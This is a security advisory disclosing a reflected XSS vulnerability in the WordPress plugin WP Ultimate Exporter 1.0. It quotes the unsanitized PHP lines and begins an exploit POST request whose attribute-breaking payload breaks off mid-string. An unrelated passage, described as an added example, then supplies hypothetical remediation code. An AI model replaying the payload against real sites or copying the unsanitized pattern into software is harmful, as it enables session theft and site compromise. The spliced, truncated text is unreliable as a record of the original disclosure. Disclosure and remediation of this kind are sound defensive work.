## FULL DISCLOSURE

#Product : WP Ultimate Exporter
#Exploit Author : Rahul Pratap Singh
#Version : 1.0
#Home page Link : https://wordpress.org/plugins/wp-ultimate-exporter/
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 24/Feb/2016

XSS Vulnerability:

----------------------------------------
Description:
----------------------------------------

The "export_name" and "export_post_type_name" request parameters are used without sanitization or output escaping, which leads to reflected XSS.

----------------------------------------
Vulnerable Code:
----------------------------------------

File Name: /wp-ultimate-exporter/includes/WUExporterUI.php

Found at line:88
$export_post_type = isset($_REQUEST['export_name']) ? $_REQUEST['export_name'] : '' ;

Found at line:89
$custom_post = isset($_REQUEST['export_post_type_name']) ? $_REQUEST['export_post_type_name'] : '' ;?>

Found at line:91

Found at line:92

----------------------------------------
Exploit:
----------------------------------------

POST /wp-admin/admin.php?page=wp_ultimate_exporter&step=exportposttype
export_name="/>
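The remediation a plugin maintainer would apply to the two lines above, as an added example that is not the plugin's own code: it assumes the values are echoed into hidden form inputs (the sink on lines 91-92 is not shown in the advisory), and the unsafe/safe function names are hypothetical.

```php
<?php
// Added example, not WP Ultimate Exporter code. The HTML sink below is an
// assumption standing in for the advisory's missing lines 91-92.

// Before: raw $_REQUEST values flow straight into attribute values, so a
// quote in the input ends the attribute and the rest is parsed as markup.
function wue_render_form_unsafe() {
    $export_post_type = isset($_REQUEST['export_name']) ? $_REQUEST['export_name'] : '';
    $custom_post      = isset($_REQUEST['export_post_type_name']) ? $_REQUEST['export_post_type_name'] : '';
    return '<input type="hidden" name="export_name" value="' . $export_post_type . '" />'
         . '<input type="hidden" name="export_post_type_name" value="' . $custom_post . '" />';
}

// After: sanitize on input, escape on output, and allow-list where the
// domain permits. wp_unslash() undoes WordPress's magic-quote slashes,
// sanitize_text_field() strips tags and invalid UTF-8, and esc_attr()
// encodes ", ', <, > and & so the value can never leave the attribute.
function wue_render_form_safe() {
    $export_post_type = isset($_REQUEST['export_name'])
        ? sanitize_text_field(wp_unslash($_REQUEST['export_name'])) : '';
    $custom_post = isset($_REQUEST['export_post_type_name'])
        ? sanitize_text_field(wp_unslash($_REQUEST['export_post_type_name'])) : '';

    // The exporter only operates on registered post types, so anything
    // else is rejected outright rather than merely escaped.
    if ($custom_post !== '' && !post_type_exists($custom_post)) {
        $custom_post = '';
    }

    return '<input type="hidden" name="export_name" value="' . esc_attr($export_post_type) . '" />'
         . '<input type="hidden" name="export_post_type_name" value="' . esc_attr($custom_post) . '" />';
}
```

Escaping must match the output context: esc_attr() is correct for attribute values, while text between tags needs esc_html() and URLs need esc_url().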